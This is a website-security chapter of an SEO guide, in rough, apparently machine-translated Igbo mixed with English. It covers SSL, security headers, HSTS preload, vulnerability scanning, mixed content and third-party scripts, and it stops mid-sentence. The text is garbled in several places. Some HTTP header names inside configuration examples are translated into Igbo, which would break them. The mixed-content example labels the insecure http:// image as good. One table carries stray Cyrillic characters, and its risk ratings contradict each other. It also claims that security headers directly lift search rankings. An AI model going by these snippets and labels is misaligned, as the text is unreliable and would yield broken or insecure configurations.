Nduzi SEO Nzọụkwụ 7: Nchedo — Ihe Google Chọrọ na 2026
Nduzi SEO Nzọụkwụ 7: Nchedo
- Nke a bụ Nzọụkwụ 7 nke Nduzi SEO 13-Step. Nchedo abụghị naanị maka ichebe ndị ọrụ - ọ na-emetụta ọnọdụ ọchụchọ gị ozugbo. Google eji HTTPS dị ka ihe atụ nke ọnọdụ si 2014, na atụmanya abawanyela.*
Most site owners think of security as a binary: "We have SSL, so we're secure." In reality, Google evaluates dozens of security signals. Sites with proper security headers, valid certificates, and no mixed content outrank sites with just a basic SSL certificate — all else being equal.
The good news: most security fixes are one-time configurations. Set them once, and they protect your rankings permanently.
Ntọala SSL
SSL (nke teknụzụ bụ TLS) na-anọchi anya njikọ n’etiti sava gị na ndị na-eleta. Ebe ọ bụ 2014, Google kwadoro HTTPS dị ka ihe atụ nke ọnọdụ. Na 2026, enweghị HTTPS abụghị naanị nsogbu ọnọdụ — Chrome na-egosi HTTP weebsaịtị dị ka "Not Secure" na eriri adreesị, na-emebi ntụkwasị obi ndị ọrụ.
Ihe achọrọ maka ntọala SSL kwesịrị ekwesị:
| Ihe achọrọ | Gịnị | Olee otú e si lelee | |-------------|-----|--------------| | Akwụkwọ ikike kwesịrị ekwesị | Expired = browser warning = bounced users | Lelee ụbọchị njedebe | | Ebe obibi zuru ezu | Ebe obibi zuru ezu adịghị arụ ọrụ na ngwaọrụ ụfọdụ | Nnwale SSL Labs | | TLS 1.2+ | Nsụhọ agadi nwere ntụpọ a maara | Nnwale SSL Labs | | Ebe akwụda SHA-1 | E mechara, browsers na-anaghị ekwenye ya | Nkọwa nke akwụkwọ ikike | | SAN mkpuchi | www na non-www ga-enye mkpuchi | Nkọwa nke akwụkwọ ikike | | Akpaghị aka merenụ | Na-ezere mmejọ nke ụbọchị njedebe | Jụọ Encrypt / onye na-enye ọrụ |
Nkọwa SSL:
100% = Akwụkwọ ikike ziri ezi + Ebe obibi zuru ezu + TLS 1.3 + Cipher siri ike + Akpaghị aka merenụ
0% = Akwụkwọ ikike amapụtaghị ma ọ bụ n'efuNjali SSL amamịhe:
- Akwụkwọ ikike na-apụ n'enweghị nkwu — Wepụta nyocha (Nzọụkwụ 6) na nso ụbọchị 30 tupu njedebe
- Ebe obibi akwụkwọ ikike adịghị zuru ezu — Sava ga-eziga akwụkwọ ikike etiti, ọ bụghị naanị akwụkwọ leaf
- Ndị nwere ọdịnaya dabara adaba — HTTPS ibe na-ebunye HTTP ihe (foto, eserese, nhọrọ)
- Redirect loops — HTTP → HTTPS → HTTP okirikiri site na misconfigured CDN/proxy
- Ndị na-adịghị www vs www mismatch — Akwụkwọ ikike na-ekpuchi otu mana ọ bụghị nke ọzọ
Quick win: Na-ahụ nyocha gị na SSL Labs (ssllabs.com/ssltest). Ihe ọ bụla dị n'okpuru "A" nwere nsogbu nwere ike ịkpọtụrụ. Most hosting providers fix these with one click.
Ihe Nchedo
Ihe nchedo bụ HTTP nhọpụta nzaghachi nke na-akpọrọ browsers otú ha ga-esi arụ ọrụ mgbe loading weebsaịtị gị. Ha na-ezere klaasị niile nke mwakpo — na crawlers Google na-anwale ha.
Ihe nchedo bụ isi:
Iwu Nchekwa Mkpụrụedemede (CSP)
CSP bụ ihe nchedo kachasị ike. Ọ na-agwa browsers nke ọma nke ihe ndị (eserese, ụdị, foto, ede) ka eji eburu na ibe gị.
Iwu-Nchekwa-Mkpụrụedemede: default-src 'self'; script-src 'self' https://cdn.example.com; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:; font-src 'self' https://fonts.gstatic.com; connect-src 'self' https://api.example.com; frame-ancestors 'none';Kedu ihe CSP na-echebe pụọ:
- Mwakpo cross-site scripting (XSS)
- Mwakpo data injection
- Clickjacking (site n’ime
frame-ancestors) - Imegharị ụgbọọrụ na-enweghị ikike (cryptominers, ad injectors)
Usoro mbipụta CSP:
- Malite na
Iwu-Nchekwa-Mkpụrụedemede-Rapụta-Naanị(na-ewepụta ọgba aghara na-enweghị igbochi) - Nyochaa akụkọ maka izu 1-2
- Whitelist isiokwu ziri ezi
- Gbanwee na ọnọdụ nkwado
- Tinye
report-urima ọ bụreport-tomaka ịkekọrịta nkwụsị na-aga n'ihu
X-Frame-Options
Na-ezere weebsaịtị gị ka enwee itinye na iframes na mpaghara ndị ọzọ (nchedo clickjacking).
X-Frame-Options: DENYMa ọ bụrụ na ịchọrọ ịkwado framing otu asụsụ:
X-Frame-Options: SAMEORIGINX-Content-Type-Options
Na-ezere browsers ịsụgharị MIME-type (ịkọwa faịlụ dị ka ụdị dị iche na nke a kọrọ).
X-Content-Type-Options: nosniffNke a na-egbochi mwakpo ebe faịlụ .jpg nwere JavaScript zoro ezo nke browser nwere ike ịrụ ọrụ.
Iwu Nzọụkwụ
Na-achịkwa ọnụọgụ nke ozi ntanetị na-eziga mgbe ndị ọrụ pịrị njikọ site na weebsaịtị gị.
Iwu Nzọụkwụ: strict-origin-when-cross-originNke a na-eziga URL zuru ezu maka arịrịọ nke otu asụsụ ma naanị ebe mgbasa ozi (domain) maka arịrịọ cross-origin. Na-ejikọta mkpa analytics na nzuzo.
Iwu Nchedo
Na-achịkwa ndị ọrụ ihe nchọgharị (kamera, microphone, geolocation, wdg.) nwere ike ịkpụgharị na weebsaịtị gị.
Iwu Nchedo: camera=(), microphone=(), geolocation=(), payment=()Inye ọrụ ịCHEGHARỊ ọnọdụ na-esighị na-ezere mwakpo site na ndị ọzọ na-emegharị.
Nmezi Iwu Nchedo (Next.js):
// next.config.js
module.exports = {
async headers() {
return [{
source: '/(.*)',
headers: [
{ key: 'X-Content-Type-Options', value: 'nosniff' },
{ key: 'X-Frame-Options', value: 'SAMEORIGIN' },
{ key: 'Referrer-Policy', value: 'strict-origin-when-cross-origin' },
{ key: 'Permissions-Policy', value: 'camera=(), microphone=(), geolocation=()' },
{ key: 'Strict-Transport-Security', value: 'max-age=31536000; includeSubDomains; preload' },
]
}]
}
}Nkwupụta Iwu Nchedo (Apache .htaccess):
Header always set X-Content-Type-Options "nosniff"
Header always set X-Frame-Options "SAMEORIGIN"
Header always set Referrer-Policy "strict-origin-when-cross-origin"
Header always set Permissions-Policy "camera=(), microphone=(), geolocation=()"
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"Nkwupụta Iwu Nchedo (Nginx):
add_header X-Content-Type-Options "nosniff" always;
add_header X-Frame-Options "SAMEORIGIN" always;
add_header Referrer-Policy "strict-origin-when-cross-origin" always;
add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;Quick win: Tinye akwụkwọ 5 niile dị n'elu na nhazi sava gị. Nke a na-ewe nkeji 5 ma na-eme ka ọnọdụ nchedo gị ka mma na ọ bụla akpụkpọ ọ bụla.
HSTS Preload
HTTP Strict Transport Security (HSTS) na-agwa browsers ka ha jiri HTTPS na weebsaịtị gị mgbe niile — ọbụna tupu arịrịọ mbụ. Na-enweghị HSTS, nzọpụta mbụ na weebsaịtị gị nwere ike iji HTTP (nwere ntụpọ) tupu redirect na HTTPS.
HSTS header:
Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadNdi isi atọ:
| Ndi isi | Ihe ọ pụtara | |-----------|---------| | max-age=31536000 | Cheta nke a maka afọ 1 (na sekọnd) | | includeSubDomains | Tinye na ihe niile subdomains | | preload | Arịa na nchịkọta preload nke browser |
HSTS preload list:
Nchedo HSTS kachasị elu. Browsers na-akwado n'ime ndepụta a ma ama nke domains nke ga-eji HTTPS mgbe niile. Igwe ibu weebsaịtị gị na hstspreload.org pụtara:
- Ndị ọbịa mbụ nweta HTTPS ozugbo (enweghị HTTP → HTTPS redirect)
- O nweghị ohere maka ndị mwakpo iji belata njikọ
- Kachasị (nwere nsogbu ịpụ mgbe a rụpụtara)
Akwụkwọ maka HSTS preload:
- Akwụkwọ HTTPS nke ọma
- Redirect HTTP niile na HTTPS (gụnyere subdomains)
- HSTS header nwere
max-age>= 31536000 - HSTS header gụnyere
includeSubDomains - HSTS header gụnyere
preload - Subdomains niile ga-akwado HTTPS
Ekwu: Naanị nyefee na preload ma ọ bụrụ na subdomains niile kwesịrị ekwesị. Usoro includeSubDomains pụtara na ọ bụla subdomain nke HTTP-only ga-abụ na akpọtu.
Quick win: Ọ bụrụ na ị nwere HTTPS na subdomains niile, tinye HSTS header zuru ezu ma nyefee na hstspreload.org. Wepụ ya na-eche banyere izu ole na ole mana nchedo ya bụ mgbe niile.
Nnyocha Ntụpọ
Nnyocha ntụpọ akpaghị aka na-ewepụta nsogbu nchekwa a maara na stack gị tupu ndị mwakpo eweghara ha.
Kedu ihe nnyocha ntụpọ na-enyocha:
- Ndị mmalite software: WordPress, plugins, JavaScript libraries nwere CVEs a maara
- Faịlụ dị na mpụ:
.env,.git,wp-config.php, database dumps - Ntọala ozi: Server version headers, debug mode, stack traces
- Akwụkwọ ikike ndabara: Ụlọ ọrụ dị na-enweghị auth, usoro ndabara
- Ihe na-emeghe ports/services: Ụdị ọrụ na-adịghị mkpa ebufere na ịntanetị
- N'ogige injections: Form enweghị CSRF nchebe, ndị na-enyefe inwe
Ntụpọ a maara site na ikpo okwu:
| Platform | Nsogbu kachasị | Idozi | |----------|-------------------|-----| | WordPress | Plugins agadi | Akpọgide + WAF | | Shopify | Nkwupụta ngwa ndị ọzọ | Nyocha ndepụta ngwa kwa ọnwa | | Next.js | Exposed API routes | Edebanye middleware + ọnụọgụ mkpana | | Static sites | CDN misconfiguration | Nyocha iwu cache | | Nchekwa | SQL injection | Parameterized queries |
Oge nnyocha:
- Kwa ụbọchị: Nnyocha akpaghị aka naSurface (SSL, headers, faịlụ dị na mpụ)
- Kwa izu: Nnyocha ntụpọ ego (npm audit, WordPress plugin scanner)
- Kwa ọnwa: Nnyocha miri emi na nnwale ikike
- Mgbe niile ọ bụla ị na-ebupụta: Nyocha nkịtị
Quick win: Na-arụ npm audit (Node.js) ma ọ bụ na-enyocha ndepụta plugin CMS gị maka akụkụ agadi. Dozie nsogbu na egwu dị mkpa/nke ukwuu ozugbo.
Ngwakọta Ndaba
Ngwakọta ndaba na-eme ka ekwentị HTTPS weebsaịtị na-eburu ihe (foto, eserese, ụdị, iframes) site na HTTP. Nke a na-ewepụ na-emebi nnyocha na-akpọ browser.
Udi ngwakọta ndaba:
| Udi | Nchekwube | Nlereanya | Ọrụ Browser | |------|----------|---------|------------------| | Nrụọrọ | Dị elu | HTTP script, iframe, CSS | Emechiri site n'ike | | Passive | Dị elu | HTTP foto, vidiyo, ụda | Ebu na nkwupụta |
Nrụọrọ ngwakọta ndaba na-emechiri site na browsers oge a — pụtara na scripts na ụdị gị adịghị ekwe ka ibudata. N'ụzọ dị iche, ngwakọta ndaba na-emebu ma na-enye nkwupụta nchekwa.
Ịhụ ngwakọta ndaba:
- Mepee Chrome DevTools → Console
- Lelee "Ngwakọta Ndaba" nkwupụta
- N'ikpeazụ, nyochaa na crawler (Screaming Frog, LANGR)
Isi mmalite ngwakọta ndaba:
- Hardcoded
http://URLs na ọdịnaya (blọgụ post, nkọwa ngwaahịa) - Ọrụ ndị ọzọ na-ebunye HTTP ihe
- Ọdụmede (YouTube old embeds, widgets nke mgbasa ozi)
- CSS
background-imagenwere HTTP URLs - Fonts nwere HTTP
Dozie ngwakọta ndaba:
<!-- Dị Mma -->
<img src="http://example.com/image.jpg" />
<!-- Dị Mma -->
<img src="https://example.com/image.jpg" />
<!-- Kasị mma (protocol-relativ, adapts to page protocol) -->
<img src="//example.com/image.jpg" />Nchekwa nchekwa (WordPress):
UPDATE wp_posts SET post_content = REPLACE(post_content, 'http://yourdomain.com', 'https://yourdomain.com');
UPDATE wp_postmeta SET meta_value = REPLACE(meta_value, 'http://yourdomain.com', 'https://yourdomain.com');Quick win: Mepee n'isi gị na Chrome, pịa F12, lelee taabụ Console maka ngwakọta ndaba nkwupụta. Dozie ndị ọ bụla na-apụta — ndị a doro anya na Google.
Rịrịdị Scripts Ụzọ Ọzọ
A na-eche taabụ na scripts ndị ọzọ na-ebupu bụ ihe iji chebe (na akụrụngwa) gị. Scripts ndị ọzọ nwere ike:
- Imegharị (supply chain attacks)
- Lelee ndị ọrụ gị na-enweghị ikikere (GDPR ihere)
- Banye ntanetị gị (render-blocking, network latency)
- Akwụkwọ arụ ọrụ (version updates, outages)
- Banye ọdịnaya a na-apụghị ịchịkwa (ad scripts gone wrong)
Nyochaa scripts ndị a na-ebupụta:
| Script | Dị mkpa? | Nchekwube | Ngwa | |--------|-----------|------------|-------------| | Google Analytics | Oge dị mkpa | Dị ala | Server-side tracking | | Ngwa nchịkọta | Ikekwe | Dị elu | Ngwa nwere onwe ya | | Bọtịnụ azụmaahịa | Kachasị | Nchekwубe | Static share links | | Nnyocha A/B | N'oge ụfọdụ | Dị elu | Server-side testing | | Pixels na-emeghe | Mkpebiahịa | Dị elu | Data nke onye mbụ | | Font CDNs | Nso | Dị ala | Fonts nke onwe |
Ichebe ihe ize ndụ maka scripts ndị a na-ebupụta dị mkpa:
- Subresource Integrity (SRI): Hash verification na-egbochi scripts na-ezighị ezi na-ebupụta.
<script src="https://cdn.example.com/lib.js"
integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxAE+sO0..."
crossorigin="anonymous"></script>- CSP mgbochi: Naanị na-enye scripts site na mpaghara a maara
- Sandboxed iframes: Kewapụ widgets ndị ọzọ
- Nyochaa kwa oge: Nyochaa all external resources kwa ọnwa
- Nlekọta: Ọpụkpọ na ala ọhụrụ nke nwere ọdịnaya nọ na ibe gị
Quick win: Depụta ihe niile